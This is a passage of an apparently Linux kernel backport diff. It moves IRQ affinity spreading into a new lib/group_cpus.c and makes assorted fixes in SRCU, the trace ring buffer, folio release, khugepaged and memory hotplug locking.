+-
+-	/* allocate vector number for each node */
+-	alloc_nodes_vectors(numvecs, node_to_cpumask, cpu_mask,
+-			    nodemsk, nmsk, node_vectors);
+-
+-	for (i = 0; i < nr_node_ids; i++) {
+-		unsigned int ncpus, v;
+-		struct node_vectors *nv = &node_vectors[i];
+-
+-		if (nv->nvectors == UINT_MAX)
+-			continue;
+-
+-		/* Get the cpus on this node which are in the mask */
+-		cpumask_and(nmsk, cpu_mask, node_to_cpumask[nv->id]);
+-		ncpus = cpumask_weight(nmsk);
+-		if (!ncpus)
+-			continue;
+-
+-		WARN_ON_ONCE(nv->nvectors > ncpus);
+-
+-		/* Account for rounding errors */
+-		extra_vecs = ncpus - nv->nvectors * (ncpus / nv->nvectors);
+-
+-		/* Spread allocated vectors on CPUs of the current node */
+-		for (v = 0; v < nv->nvectors; v++, curvec++) {
+-			cpus_per_vec = ncpus / nv->nvectors;
+-
+-			/* Account for extra vectors to compensate rounding errors */
+-			if (extra_vecs) {
+-				cpus_per_vec++;
+-				--extra_vecs;
+-			}
+-
+-			/*
+-			 * wrapping has to be considered given 'startvec'
+-			 * may start anywhere
+-			 */
+-			if (curvec >= last_affv)
+-				curvec = firstvec;
+-			irq_spread_init_one(&masks[curvec].mask, nmsk,
+-						cpus_per_vec);
+-		}
+-		done += nv->nvectors;
+-	}
+-	kfree(node_vectors);
+-	return done;
+-}
+-
+-/*
+- * build affinity in two stages:
+- *	1) spread present CPU on these vectors
+- *	2) spread other possible CPUs on these vectors
+- */
+-static int irq_build_affinity_masks(unsigned int startvec, unsigned int numvecs,
+-				    unsigned int firstvec,
+-				    struct irq_affinity_desc *masks)
+-{
+-	unsigned int curvec = startvec, nr_present = 0, nr_others = 0;
+-	cpumask_var_t *node_to_cpumask;
+-	cpumask_var_t nmsk, npresmsk;
+-	int ret = -ENOMEM;
+-
+-	if (!zalloc_cpumask_var(&nmsk, GFP_KERNEL))
+-		return ret;
+-
+-	if (!zalloc_cpumask_var(&npresmsk, GFP_KERNEL))
+-		goto fail_nmsk;
+-
+-	node_to_cpumask = alloc_node_to_cpumask();
+-	if (!node_to_cpumask)
+-		goto fail_npresmsk;
+-
+-	/* Stabilize the cpumasks */
+-	cpus_read_lock();
+-	build_node_to_cpumask(node_to_cpumask);
+-
+-	/* Spread on present CPUs starting from affd->pre_vectors */
+-	ret = __irq_build_affinity_masks(curvec, numvecs, firstvec,
+-					 node_to_cpumask, cpu_present_mask,
+-					 nmsk, masks);
+-	if (ret < 0)
+-		goto fail_build_affinity;
+-	nr_present = ret;
+-
+-	/*
+-	 * Spread on non present CPUs starting from the next vector to be
+-	 * handled. If the spreading of present CPUs already exhausted the
+-	 * vector space, assign the non present CPUs to the already spread
+-	 * out vectors.
+-	 */
+-	if (nr_present >= numvecs)
+-		curvec = firstvec;
+-	else
+-		curvec = firstvec + nr_present;
+-	cpumask_andnot(npresmsk, cpu_possible_mask, cpu_present_mask);
+-	ret = __irq_build_affinity_masks(curvec, numvecs, firstvec,
+-					 node_to_cpumask, npresmsk, nmsk,
+-					 masks);
+-	if (ret >= 0)
+-		nr_others = ret;
+-
+- fail_build_affinity:
+-	cpus_read_unlock();
+-
+-	if (ret >= 0)
+-		WARN_ON(nr_present + nr_others < numvecs);
+-
+-	free_node_to_cpumask(node_to_cpumask);
+-
+- fail_npresmsk:
+-	free_cpumask_var(npresmsk);
+-
+- fail_nmsk:
+-	free_cpumask_var(nmsk);
+-	return ret < 0 ? ret : 0;
+-}
++#include <linux/group_cpus.h>
+ 
+ static void default_calc_sets(struct irq_affinity *affd, unsigned int affvecs)
+ {
+@@ -461,14 +70,18 @@ irq_create_affinity_masks(unsigned int nvecs, struct irq_affinity *affd)
+ 	 */
+ 	for (i = 0, usedvecs = 0; i < affd->nr_sets; i++) {
+ 		unsigned int this_vecs = affd->set_size[i];
+-		int ret;
++		int j;
++		struct cpumask *result = group_cpus_evenly(this_vecs);
+ 
+-		ret = irq_build_affinity_masks(curvec, this_vecs,
+-					       curvec, masks);
+-		if (ret) {
++		if (!result) {
+ 			kfree(masks);
+ 			return NULL;
+ 		}
++
++		for (j = 0; j < this_vecs; j++)
++			cpumask_copy(&masks[curvec + j].mask, &result[j]);
++		kfree(result);
++
+ 		curvec += this_vecs;
+ 		usedvecs += this_vecs;
+ 	}
+diff --git a/kernel/rcu/srcutree.c b/kernel/rcu/srcutree.c
+index 8fdf076720384..929dcbc04d29c 100644
+--- a/kernel/rcu/srcutree.c
++++ b/kernel/rcu/srcutree.c
+@@ -1100,10 +1100,37 @@ static unsigned long srcu_gp_start_if_needed(struct srcu_struct *ssp,
+ 	spin_lock_irqsave_sdp_contention(sdp, &flags);
+ 	if (rhp)
+ 		rcu_segcblist_enqueue(&sdp->srcu_cblist, rhp);
++	/*
++	 * The snapshot for acceleration must be taken _before_ the read of the
++	 * current gp sequence used for advancing, otherwise advancing may fail
++	 * and acceleration may then fail too.
++	 *
++	 * This could happen if:
++	 *
++	 *  1) The RCU_WAIT_TAIL segment has callbacks (gp_num = X + 4) and the
++	 *     RCU_NEXT_READY_TAIL also has callbacks (gp_num = X + 8).
++	 *
++	 *  2) The grace period for RCU_WAIT_TAIL is seen as started but not
++	 *     completed so rcu_seq_current() returns X + SRCU_STATE_SCAN1.
++	 *
++	 *  3) This value is passed to rcu_segcblist_advance() which can't move
++	 *     any segment forward and fails.
++	 *
++	 *  4) srcu_gp_start_if_needed() still proceeds with callback acceleration.
++	 *     But then the call to rcu_seq_snap() observes the grace period for the
++	 *     RCU_WAIT_TAIL segment as completed and the subsequent one for the
++	 *     RCU_NEXT_READY_TAIL segment as started (ie: X + 4 + SRCU_STATE_SCAN1)
++	 *     so it returns a snapshot of the next grace period, which is X + 12.
++	 *
++	 *  5) The value of X + 12 is passed to rcu_segcblist_accelerate() but the
++	 *     freshly enqueued callback in RCU_NEXT_TAIL can't move to
++	 *     RCU_NEXT_READY_TAIL which already has callbacks for a previous grace
++	 *     period (gp_num = X + 8). So acceleration fails.
++	 */
++	s = rcu_seq_snap(&ssp->srcu_gp_seq);
+ 	rcu_segcblist_advance(&sdp->srcu_cblist,
+ 			      rcu_seq_current(&ssp->srcu_gp_seq));
+-	s = rcu_seq_snap(&ssp->srcu_gp_seq);
+-	(void)rcu_segcblist_accelerate(&sdp->srcu_cblist, s);
++	WARN_ON_ONCE(!rcu_segcblist_accelerate(&sdp->srcu_cblist, s) && rhp);
+ 	if (ULONG_CMP_LT(sdp->srcu_gp_seq_needed, s)) {
+ 		sdp->srcu_gp_seq_needed = s;
+ 		needgp = true;
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 06d52525407b8..71cad4f1323c6 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -646,8 +646,8 @@ static inline bool __rb_time_read(rb_time_t *t, u64 *ret, unsigned long *cnt)
+ 
+ 	*cnt = rb_time_cnt(top);
+ 
+-	/* If top and msb counts don't match, this interrupted a write */
+-	if (*cnt != rb_time_cnt(msb))
++	/* If top, msb or bottom counts don't match, this interrupted a write */
++	if (*cnt != rb_time_cnt(msb) || *cnt != rb_time_cnt(bottom))
+ 		return false;
+ 
+ 	/* The shift to msb will lose its cnt bits */
+diff --git a/lib/Makefile b/lib/Makefile
+index 5ffe72ec99797..6f1611d053e6a 100644
+--- a/lib/Makefile
++++ b/lib/Makefile
+@@ -361,6 +361,8 @@ obj-$(CONFIG_SBITMAP) += sbitmap.o
+ 
+ obj-$(CONFIG_PARMAN) += parman.o
+ 
++obj-y += group_cpus.o
++
+ # GCC library routines
+ obj-$(CONFIG_GENERIC_LIB_ASHLDI3) += ashldi3.o
+ obj-$(CONFIG_GENERIC_LIB_ASHRDI3) += ashrdi3.o
+diff --git a/lib/group_cpus.c b/lib/group_cpus.c
+new file mode 100644
+index 0000000000000..0292611901b8b
+--- /dev/null
++++ b/lib/group_cpus.c
+@@ -0,0 +1,438 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ * Copyright (C) 2016 Thomas Gleixner.
++ * Copyright (C) 2016-2017 Christoph Hellwig.
++ */
++#include <linux/kernel.h>
++#include <linux/slab.h>
++#include <linux/cpu.h>
++#include <linux/sort.h>
++#include <linux/group_cpus.h>
++
++#ifdef CONFIG_SMP
++
++static void grp_spread_init_one(struct cpumask *irqmsk, struct cpumask *nmsk,
++				unsigned int cpus_per_grp)
++{
++	const struct cpumask *siblmsk;
++	int cpu, sibl;
++
++	for ( ; cpus_per_grp > 0; ) {
++		cpu = cpumask_first(nmsk);
++
++		/* Should not happen, but I'm too lazy to think about it */
++		if (cpu >= nr_cpu_ids)
++			return;
++
++		cpumask_clear_cpu(cpu, nmsk);
++		cpumask_set_cpu(cpu, irqmsk);
++		cpus_per_grp--;
++
++		/* If the cpu has siblings, use them first */
++		siblmsk = topology_sibling_cpumask(cpu);
++		for (sibl = -1; cpus_per_grp > 0; ) {
++			sibl = cpumask_next(sibl, siblmsk);
++			if (sibl >= nr_cpu_ids)
++				break;
++			if (!cpumask_test_and_clear_cpu(sibl, nmsk))
++				continue;
++			cpumask_set_cpu(sibl, irqmsk);
++			cpus_per_grp--;
++		}
++	}
++}
++
++static cpumask_var_t *alloc_node_to_cpumask(void)
++{
++	cpumask_var_t *masks;
++	int node;
++
++	masks = kcalloc(nr_node_ids, sizeof(cpumask_var_t), GFP_KERNEL);
++	if (!masks)
++		return NULL;
++
++	for (node = 0; node < nr_node_ids; node++) {
++		if (!zalloc_cpumask_var(&masks[node], GFP_KERNEL))
++			goto out_unwind;
++	}
++
++	return masks;
++
++out_unwind:
++	while (--node >= 0)
++		free_cpumask_var(masks[node]);
++	kfree(masks);
++	return NULL;
++}
++
++static void free_node_to_cpumask(cpumask_var_t *masks)
++{
++	int node;
++
++	for (node = 0; node < nr_node_ids; node++)
++		free_cpumask_var(masks[node]);
++	kfree(masks);
++}
++
++static void build_node_to_cpumask(cpumask_var_t *masks)
++{
++	int cpu;
++
++	for_each_possible_cpu(cpu)
++		cpumask_set_cpu(cpu, masks[cpu_to_node(cpu)]);
++}
++
++static int get_nodes_in_cpumask(cpumask_var_t *node_to_cpumask,
++				const struct cpumask *mask, nodemask_t *nodemsk)
++{
++	int n, nodes = 0;
++
++	/* Calculate the number of nodes in the supplied affinity mask */
++	for_each_node(n) {
++		if (cpumask_intersects(mask, node_to_cpumask[n])) {
++			node_set(n, *nodemsk);
++			nodes++;
++		}
++	}
++	return nodes;
++}
++
++struct node_groups {
++	unsigned id;
++
++	union {
++		unsigned ngroups;
++		unsigned ncpus;
++	};
++};
++
++static int ncpus_cmp_func(const void *l, const void *r)
++{
++	const struct node_groups *ln = l;
++	const struct node_groups *rn = r;
++
++	return ln->ncpus - rn->ncpus;
++}
++
++/*
++ * Allocate group number for each node, so that for each node:
++ *
++ * 1) the allocated number is >= 1
++ *
++ * 2) the allocated number is <= active CPU number of this node
++ *
++ * The actual allocated total groups may be less than @numgrps when
++ * active total CPU number is less than @numgrps.
++ *
++ * Active CPUs means the CPUs in '@cpu_mask AND @node_to_cpumask[]'
++ * for each node.
++ */
++static void alloc_nodes_groups(unsigned int numgrps,
++			       cpumask_var_t *node_to_cpumask,
++			       const struct cpumask *cpu_mask,
++			       const nodemask_t nodemsk,
++			       struct cpumask *nmsk,
++			       struct node_groups *node_groups)
++{
++	unsigned n, remaining_ncpus = 0;
++
++	for (n = 0; n < nr_node_ids; n++) {
++		node_groups[n].id = n;
++		node_groups[n].ncpus = UINT_MAX;
++	}
++
++	for_each_node_mask(n, nodemsk) {
++		unsigned ncpus;
++
++		cpumask_and(nmsk, cpu_mask, node_to_cpumask[n]);
++		ncpus = cpumask_weight(nmsk);
++
++		if (!ncpus)
++			continue;
++		remaining_ncpus += ncpus;
++		node_groups[n].ncpus = ncpus;
++	}
++
++	numgrps = min_t(unsigned, remaining_ncpus, numgrps);
++
++	sort(node_groups, nr_node_ids, sizeof(node_groups[0]),
++	     ncpus_cmp_func, NULL);
++
++	/*
++	 * Allocate groups for each node according to the ratio of this
++	 * node's nr_cpus to remaining un-assigned ncpus. 'numgrps' is
++	 * bigger than number of active numa nodes. Always start the
++	 * allocation from the node with minimized nr_cpus.
++	 *
++	 * This way guarantees that each active node gets allocated at
++	 * least one group, and the theory is simple: over-allocation
++	 * is only done when this node is assigned by one group, so
++	 * other nodes will be allocated >= 1 groups, since 'numgrps' is
++	 * bigger than number of numa nodes.
++	 *
++	 * One perfect invariant is that number of allocated groups for
++	 * each node is <= CPU count of this node:
++	 *
++	 * 1) suppose there are two nodes: A and B
++	 * 	ncpu(X) is CPU count of node X
++	 * 	grps(X) is the group count allocated to node X via this
++	 * 	algorithm
++	 *
++	 * 	ncpu(A) <= ncpu(B)
++	 * 	ncpu(A) + ncpu(B) = N
++	 * 	grps(A) + grps(B) = G
++	 *
++	 * 	grps(A) = max(1, round_down(G * ncpu(A) / N))
++	 * 	grps(B) = G - grps(A)
++	 *
++	 * 	both N and G are integer, and 2 <= G <= N, suppose
++	 * 	G = N - delta, and 0 <= delta <= N - 2
++	 *
++	 * 2) obviously grps(A) <= ncpu(A) because:
++	 *
++	 * 	if grps(A) is 1, then grps(A) <= ncpu(A) given
++	 * 	ncpu(A) >= 1
++	 *
++	 * 	otherwise,
++	 * 		grps(A) <= G * ncpu(A) / N <= ncpu(A), given G <= N
++	 *
++	 * 3) prove how grps(B) <= ncpu(B):
++	 *
++	 * 	if round_down(G * ncpu(A) / N) == 0, vecs(B) won't be
++	 * 	over-allocated, so grps(B) <= ncpu(B),
++	 *
++	 * 	otherwise:
++	 *
++	 * 	grps(A) =
++	 * 		round_down(G * ncpu(A) / N) =
++	 * 		round_down((N - delta) * ncpu(A) / N) =
++	 * 		round_down((N * ncpu(A) - delta * ncpu(A)) / N)	 >=
++	 * 		round_down((N * ncpu(A) - delta * N) / N)	 =
++	 * 		cpu(A) - delta
++	 *
++	 * 	then:
++	 *
++	 * 	grps(A) - G >= ncpu(A) - delta - G
++	 * 	=>
++	 * 	G - grps(A) <= G + delta - ncpu(A)
++	 * 	=>
++	 * 	grps(B) <= N - ncpu(A)
++	 * 	=>
++	 * 	grps(B) <= cpu(B)
++	 *
++	 * For nodes >= 3, it can be thought as one node and another big
++	 * node given that is exactly what this algorithm is implemented,
++	 * and we always re-calculate 'remaining_ncpus' & 'numgrps', and
++	 * finally for each node X: grps(X) <= ncpu(X).
++	 *
++	 */
++	for (n = 0; n < nr_node_ids; n++) {
++		unsigned ngroups, ncpus;
++
++		if (node_groups[n].ncpus == UINT_MAX)
++			continue;
++
++		WARN_ON_ONCE(numgrps == 0);
++
++		ncpus = node_groups[n].ncpus;
++		ngroups = max_t(unsigned, 1,
++				 numgrps * ncpus / remaining_ncpus);
++		WARN_ON_ONCE(ngroups > ncpus);
++
++		node_groups[n].ngroups = ngroups;
++
++		remaining_ncpus -= ncpus;
++		numgrps -= ngroups;
++	}
++}
++
++static int __group_cpus_evenly(unsigned int startgrp, unsigned int numgrps,
++			       cpumask_var_t *node_to_cpumask,
++			       const struct cpumask *cpu_mask,
++			       struct cpumask *nmsk, struct cpumask *masks)
++{
++	unsigned int i, n, nodes, cpus_per_grp, extra_grps, done = 0;
++	unsigned int last_grp = numgrps;
++	unsigned int curgrp = startgrp;
++	nodemask_t nodemsk = NODE_MASK_NONE;
++	struct node_groups *node_groups;
++
++	if (cpumask_empty(cpu_mask))
++		return 0;
++
++	nodes = get_nodes_in_cpumask(node_to_cpumask, cpu_mask, &nodemsk);
++
++	/*
++	 * If the number of nodes in the mask is greater than or equal the
++	 * number of groups we just spread the groups across the nodes.
++	 */
++	if (numgrps <= nodes) {
++		for_each_node_mask(n, nodemsk) {
++			/* Ensure that only CPUs which are in both masks are set */
++			cpumask_and(nmsk, cpu_mask, node_to_cpumask[n]);
++			cpumask_or(&masks[curgrp], &masks[curgrp], nmsk);
++			if (++curgrp == last_grp)
++				curgrp = 0;
++		}
++		return numgrps;
++	}
++
++	node_groups = kcalloc(nr_node_ids,
++			       sizeof(struct node_groups),
++			       GFP_KERNEL);
++	if (!node_groups)
++		return -ENOMEM;
++
++	/* allocate group number for each node */
++	alloc_nodes_groups(numgrps, node_to_cpumask, cpu_mask,
++			   nodemsk, nmsk, node_groups);
++	for (i = 0; i < nr_node_ids; i++) {
++		unsigned int ncpus, v;
++		struct node_groups *nv = &node_groups[i];
++
++		if (nv->ngroups == UINT_MAX)
++			continue;
++
++		/* Get the cpus on this node which are in the mask */
++		cpumask_and(nmsk, cpu_mask, node_to_cpumask[nv->id]);
++		ncpus = cpumask_weight(nmsk);
++		if (!ncpus)
++			continue;
++
++		WARN_ON_ONCE(nv->ngroups > ncpus);
++
++		/* Account for rounding errors */
++		extra_grps = ncpus - nv->ngroups * (ncpus / nv->ngroups);
++
++		/* Spread allocated groups on CPUs of the current node */
++		for (v = 0; v < nv->ngroups; v++, curgrp++) {
++			cpus_per_grp = ncpus / nv->ngroups;
++
++			/* Account for extra groups to compensate rounding errors */
++			if (extra_grps) {
++				cpus_per_grp++;
++				--extra_grps;
++			}
++
++			/*
++			 * wrapping has to be considered given 'startgrp'
++			 * may start anywhere
++			 */
++			if (curgrp >= last_grp)
++				curgrp = 0;
++			grp_spread_init_one(&masks[curgrp], nmsk,
++						cpus_per_grp);
++		}
++		done += nv->ngroups;
++	}
++	kfree(node_groups);
++	return done;
++}
++
++/**
++ * group_cpus_evenly - Group all CPUs evenly per NUMA/CPU locality
++ * @numgrps: number of groups
++ *
++ * Return: cpumask array if successful, NULL otherwise. And each element
++ * includes CPUs assigned to this group
++ *
++ * Try to put close CPUs from viewpoint of CPU and NUMA locality into
++ * same group, and run two-stage grouping:
++ *	1) allocate present CPUs on these groups evenly first
++ *	2) allocate other possible CPUs on these groups evenly
++ *
++ * We guarantee in the resulted grouping that all CPUs are covered, and
++ * no same CPU is assigned to multiple groups
++ */
++struct cpumask *group_cpus_evenly(unsigned int numgrps)
++{
++	unsigned int curgrp = 0, nr_present = 0, nr_others = 0;
++	cpumask_var_t *node_to_cpumask;
++	cpumask_var_t nmsk, npresmsk;
++	int ret = -ENOMEM;
++	struct cpumask *masks = NULL;
++
++	if (!zalloc_cpumask_var(&nmsk, GFP_KERNEL))
++		return NULL;
++
++	if (!zalloc_cpumask_var(&npresmsk, GFP_KERNEL))
++		goto fail_nmsk;
++
++	node_to_cpumask = alloc_node_to_cpumask();
++	if (!node_to_cpumask)
++		goto fail_npresmsk;
++
++	masks = kcalloc(numgrps, sizeof(*masks), GFP_KERNEL);
++	if (!masks)
++		goto fail_node_to_cpumask;
++
++	build_node_to_cpumask(node_to_cpumask);
++
++	/*
++	 * Make a local cache of 'cpu_present_mask', so the two stages
++	 * spread can observe consistent 'cpu_present_mask' without holding
++	 * cpu hotplug lock, then we can reduce deadlock risk with cpu
++	 * hotplug code.
++	 *
++	 * Here CPU hotplug may happen when reading `cpu_present_mask`, and
++	 * we can live with the case because it only affects that hotplug
++	 * CPU is handled in the 1st or 2nd stage, and either way is correct
++	 * from API user viewpoint since 2-stage spread is sort of
++	 * optimization.
++	 */
++	cpumask_copy(npresmsk, data_race(cpu_present_mask));
++
++	/* grouping present CPUs first */
++	ret = __group_cpus_evenly(curgrp, numgrps, node_to_cpumask,
++				  npresmsk, nmsk, masks);
++	if (ret < 0)
++		goto fail_build_affinity;
++	nr_present = ret;
++
++	/*
++	 * Allocate non present CPUs starting from the next group to be
++	 * handled. If the grouping of present CPUs already exhausted the
++	 * group space, assign the non present CPUs to the already
++	 * allocated out groups.
++	 */
++	if (nr_present >= numgrps)
++		curgrp = 0;
++	else
++		curgrp = nr_present;
++	cpumask_andnot(npresmsk, cpu_possible_mask, npresmsk);
++	ret = __group_cpus_evenly(curgrp, numgrps, node_to_cpumask,
++				  npresmsk, nmsk, masks);
++	if (ret >= 0)
++		nr_others = ret;
++
++ fail_build_affinity:
++	if (ret >= 0)
++		WARN_ON(nr_present + nr_others < numgrps);
++
++ fail_node_to_cpumask:
++	free_node_to_cpumask(node_to_cpumask);
++
++ fail_npresmsk:
++	free_cpumask_var(npresmsk);
++
++ fail_nmsk:
++	free_cpumask_var(nmsk);
++	if (ret < 0) {
++		kfree(masks);
++		return NULL;
++	}
++	return masks;
++}
++#else /* CONFIG_SMP */
++struct cpumask *group_cpus_evenly(unsigned int numgrps)
++{
++	struct cpumask *masks = kcalloc(numgrps, sizeof(*masks), GFP_KERNEL);
++
++	if (!masks)
++		return NULL;
++
++	/* assign all CPUs(cpu 0) to the 1st group only */
++	cpumask_copy(&masks[0], cpu_possible_mask);
++	return masks;
++}
++#endif /* CONFIG_SMP */
+diff --git a/mm/filemap.c b/mm/filemap.c
+index 10fe6430693bd..2809b1174f04e 100644
+--- a/mm/filemap.c
++++ b/mm/filemap.c
+@@ -4005,6 +4005,8 @@ bool filemap_release_folio(struct folio *folio, gfp_t gfp)
+ 	struct address_space * const mapping = folio->mapping;
+ 
+ 	BUG_ON(!folio_test_locked(folio));
++	if (!folio_needs_release(folio))
++		return true;
+ 	if (folio_test_writeback(folio))
+ 		return false;
+ 
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index 2753fb54cdf38..59577946735b1 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -2694,8 +2694,7 @@ int split_huge_page_to_list(struct page *page, struct list_head *list)
+ 		gfp = current_gfp_context(mapping_gfp_mask(mapping) &
+ 							GFP_RECLAIM_MASK);
+ 
+-		if (folio_test_private(folio) &&
+-				!filemap_release_folio(folio, gfp)) {
++		if (!filemap_release_folio(folio, gfp)) {
+ 			ret = -EBUSY;
+ 			goto out;
+ 		}
+diff --git a/mm/internal.h b/mm/internal.h
+index 6b7ef495b56d3..d01130efce5fb 100644
+--- a/mm/internal.h
++++ b/mm/internal.h
+@@ -163,6 +163,17 @@ static inline void set_page_refcounted(struct page *page)
+ 	set_page_count(page, 1);
+ }
+ 
++/*
++ * Return true if a folio needs ->release_folio() calling upon it.
++ */
++static inline bool folio_needs_release(struct folio *folio)
++{
++	struct address_space *mapping = folio_mapping(folio);
++
++	return folio_has_private(folio) ||
++		(mapping && mapping_release_always(mapping));
++}
++
+ extern unsigned long highest_memmap_pfn;
+ 
+ /*
+diff --git a/mm/khugepaged.c b/mm/khugepaged.c
+index ef72d3df4b65b..65bd0b105266a 100644
+--- a/mm/khugepaged.c
++++ b/mm/khugepaged.c
+@@ -1818,6 +1818,7 @@ static int collapse_file(struct mm_struct *mm, unsigned long addr,
+ 	xas_set(&xas, start);
+ 	for (index = start; index < end; index++) {
+ 		struct page *page = xas_next(&xas);
++		struct folio *folio;
+ 
+ 		VM_BUG_ON(index != xas.xa_index);
+ 		if (is_shmem) {
+@@ -1844,8 +1845,6 @@ static int collapse_file(struct mm_struct *mm, unsigned long addr,
+ 			}
+ 
+ 			if (xa_is_value(page) || !PageUptodate(page)) {
+-				struct folio *folio;
+-
+ 				xas_unlock_irq(&xas);
+ 				/* swap in or instantiate fallocated page */
+ 				if (shmem_get_folio(mapping->host, index,
+@@ -1933,13 +1932,15 @@ static int collapse_file(struct mm_struct *mm, unsigned long addr,
+ 			goto out_unlock;
+ 		}
+ 
+-		if (page_mapping(page) != mapping) {
++		folio = page_folio(page);
++
++		if (folio_mapping(folio) != mapping) {
+ 			result = SCAN_TRUNCATED;
+ 			goto out_unlock;
+ 		}
+ 
+-		if (!is_shmem && (PageDirty(page) ||
+-				  PageWriteback(page))) {
++		if (!is_shmem && (folio_test_dirty(folio) ||
++				  folio_test_writeback(folio))) {
+ 			/*
+ 			 * khugepaged only works on read-only fd, so this
+ 			 * page is dirty because it hasn't been flushed
+@@ -1949,20 +1950,19 @@ static int collapse_file(struct mm_struct *mm, unsigned long addr,
+ 			goto out_unlock;
+ 		}
+ 
+-		if (isolate_lru_page(page)) {
++		if (folio_isolate_lru(folio)) {
+ 			result = SCAN_DEL_PAGE_LRU;
+ 			goto out_unlock;
+ 		}
+ 
+-		if (page_has_private(page) &&
+-		    !try_to_release_page(page, GFP_KERNEL)) {
++		if (!filemap_release_folio(folio, GFP_KERNEL)) {
+ 			result = SCAN_PAGE_HAS_PRIVATE;
+-			putback_lru_page(page);
++			folio_putback_lru(folio);
+ 			goto out_unlock;
+ 		}
+ 
+-		if (page_mapped(page))
+-			try_to_unmap(page_folio(page),
++		if (folio_mapped(folio))
++			try_to_unmap(folio,
+ 					TTU_IGNORE_MLOCK | TTU_BATCH_FLUSH);
+ 
+ 		xas_lock_irq(&xas);
+diff --git a/mm/memory-failure.c b/mm/memory-failure.c
+index ebd717157c813..5b846ed5dcbe9 100644
+--- a/mm/memory-failure.c
++++ b/mm/memory-failure.c
+@@ -827,16 +827,15 @@ static int truncate_error_page(struct page *p, unsigned long pfn,
+ 	int ret = MF_FAILED;
+ 
+ 	if (mapping->a_ops->error_remove_page) {
++		struct folio *folio = page_folio(p);
+ 		int err = mapping->a_ops->error_remove_page(mapping, p);
+ 
+-		if (err != 0) {
++		if (err != 0)
+ 			pr_info("%#lx: Failed to punch page: %d\n", pfn, err);
+-		} else if (page_has_private(p) &&
+-			   !try_to_release_page(p, GFP_NOIO)) {
++		else if (!filemap_release_folio(folio, GFP_NOIO))
+ 			pr_info("%#lx: failed to release buffers\n", pfn);
+-		} else {
++		else
+ 			ret = MF_RECOVERED;
+-		}
+ 	} else {
+ 		/*
+ 		 * If the file system doesn't support it just invalidate
+diff --git a/mm/memory.c b/mm/memory.c
+index 0d1b3ee8fcd7a..fc8b264ec0cac 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -3617,8 +3617,8 @@ EXPORT_SYMBOL_GPL(unmap_mapping_pages);
+ void unmap_mapping_range(struct address_space *mapping,
+ 		loff_t const holebegin, loff_t const holelen, int even_cows)
+ {
+-	pgoff_t hba = holebegin >> PAGE_SHIFT;
+-	pgoff_t hlen = (holelen + PAGE_SIZE - 1) >> PAGE_SHIFT;
++	pgoff_t hba = (pgoff_t)(holebegin) >> PAGE_SHIFT;
++	pgoff_t hlen = ((pgoff_t)(holelen) + PAGE_SIZE - 1) >> PAGE_SHIFT;
+ 
+ 	/* Check for overflow. */
+ 	if (sizeof(holelen) > sizeof(hlen)) {
+diff --git a/mm/memory_hotplug.c b/mm/memory_hotplug.c
+index bd2570b4f9b7b..3b9d3a4b43869 100644
+--- a/mm/memory_hotplug.c
++++ b/mm/memory_hotplug.c
+@@ -1069,6 +1069,9 @@ void mhp_deinit_memmap_on_memory(unsigned long pfn, unsigned long nr_pages)
+ 	kasan_remove_zero_shadow(__va(PFN_PHYS(pfn)), PFN_PHYS(nr_pages));
+ }
+ 
++/*
++ * Must be called with mem_hotplug_lock in write mode.
++ */
+ int __ref online_pages(unsigned long pfn, unsigned long nr_pages,
+ 		       struct zone *zone, struct memory_group *group)
+ {
+@@ -1089,7 +1092,6 @@ int __ref online_pages(unsigned long pfn, unsigned long nr_pages,
+ 			 !IS_ALIGNED(pfn + nr_pages, PAGES_PER_SECTION)))
+ 		return -EINVAL;
+ 
+-	mem_hotplug_begin();
+ 
+ 	/* associate pfn range with the zone */
+ 	move_pfn_range_to_zone(zone, pfn, nr_pages, NULL, MIGRATE_ISOLATE);
+@@ -1148,7 +1150,6 @@ int __ref online_pages(unsigned long pfn, unsigned long nr_pages,
+ 	writeback_set_ratelimit();
+ 
+ 	memory_notify(MEM_ONLINE, &arg);
+-	mem_hotplug_done();
+ 	return 0;
+ 
+ failed_addition:
+@@ -1157,7 +1158,6 @@ failed_addition:
+ 		 (((unsigned long long) pfn + nr_pages) << PAGE_SHIFT) - 1);
+ 	memory_notify(MEM_CANCEL_ONLINE, &arg);
+ 	remove_pfn_range_from_zone(zone, pfn, nr_pages);
+-	mem_hotplug_done();
+ 	return ret;
+ }
+ 
+@@ -1382,7 +1382,7 @@ int __ref add_memory_resource(int nid, struct resource *res, mhp_t mhp_flags)
+ 	ret = create_memory_block_devices(start, size, mhp_altmap.alloc,
+ 					  group);
+ 	if (ret) {
+-		arch_remove_memory(start, size, NULL);
++		arch_remove_memory(start, size, params.altmap);
+ 		goto error;
+ 	}
+ 
+@@ -1787,6 +1787,9 @@ static int count_system_ram_pages_cb(unsigned long start_pfn,
+ 	return 0;
+ }
+ 
++/*
++ * Must be called with mem_hotplug_lock in write mode.
++ */
+ int __ref offline_pages(unsigned long start_pfn, unsigned long nr_pages,
+ 			struct zone *zone, struct memory_group *group)
+ {
+@@ -1809,8 +1812,6 @@ int __ref offline_pages(unsigned long start_pfn, unsigned long nr_pages,
+ 			 !IS_ALIGNED(start_pfn + nr_pages, PAGES_PER_SECTION)))
+ 		return -EINVAL;
+ 
+-	mem_hotplug_begin();
+-
+ 	/*
+ 	 * Don't allow to offline memory blocks that contain holes.
+ 	 * Consequently, memory blocks with holes can never get onlined
+@@ -1946,7 +1947,6 @@ int __ref offline_pages(unsigned long start_pfn, unsigned long nr_pages,
+ 
+ 	memory_notify(MEM_OFFLINE, &arg);
+ 	remove_pfn_range_from_zone(zone, start_pfn, nr_pages);
+-	mem_hotplug_done();
+ 	return 0;
+ 
+ failed_removal_isolated:
+@@ -1961,7 +1961,6 @@ failed_removal:
+ 		 (unsigned long long) start_pfn << PAGE_SHIFT,
+ 		 ((unsigned long long) end_pfn << PAGE_SHIFT) - 1,
+ 		 reason);
+-	mem_hotplug_done();
+ 	return ret;
+ }
+ 
+diff --git a/mm/migrate.c b/mm/migrate.c
+index 91bd69c61148e..c93dd6a31c31a 100644
+--- a/mm/migrate.c
++++ b/mm/migrate.c
+@@ -914,8 +914,7 @@ static int fallback_migrate_folio(struct address_space *mapping,
+ 	 * Buffers may be managed in a filesystem specific way.
+ 	 * We must have no buffers or drop them.
+ 	 */
